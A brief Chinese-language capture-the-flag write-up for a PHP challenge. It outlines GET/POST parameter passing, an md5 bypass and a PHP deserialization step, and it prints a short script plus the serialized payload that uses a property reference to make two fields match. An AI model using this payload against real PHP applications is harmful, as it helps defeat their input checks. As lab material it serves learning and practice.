0、打開靶機后,是php源碼
1、第一層是GET,POST傳參
2、第二層md5繞過
3、第三層是php反序列
1 <?php 2 class BUU{ 3 public $correct=""; 4 public $input=""; 5 } 6 7 $obj= new BUU; 8 $obj->input=&$obj->correct; 9 echo serialize($obj); 10 ?>
得到的字符串:
O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
4、放postman。